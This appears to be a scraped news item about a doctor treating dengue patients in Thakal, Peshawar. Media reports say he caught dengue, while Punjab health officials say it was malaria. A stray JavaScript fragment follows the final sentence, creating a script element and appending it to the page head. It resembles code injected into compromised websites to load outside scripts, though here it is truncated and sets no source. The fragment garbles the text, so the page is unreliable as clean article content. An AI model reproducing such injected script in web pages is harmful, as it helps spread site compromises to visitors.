PESHAWAR: A doctor treating dengue patients in the area of Thakal Peshawar has allegedly contracted dengue virus.

According to media reports Dr. Abid was appointed in the area of Thakal to provide treatment to dengue patients where he contracted dengue virus. Later he returned to his hometown Mianwali.

On the other hand the Incharge Punjab health department, Dr. Farooq Sultan denied the reports and said that “Dr. Abid has not been diagnosed as dengue patient but he has contracted malaria”. He added that doctors have to spend day and night among dengue and malaria patients while discharging their duties therefore, contracting malaria by any doctor is not any matter of concern.

Additional DG Health Punjab Dr. Farah while confirming the reports that Dr Abid has contracted malaria instead of dengue has said that he had returned to Punjab after suffering from malaria.var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);
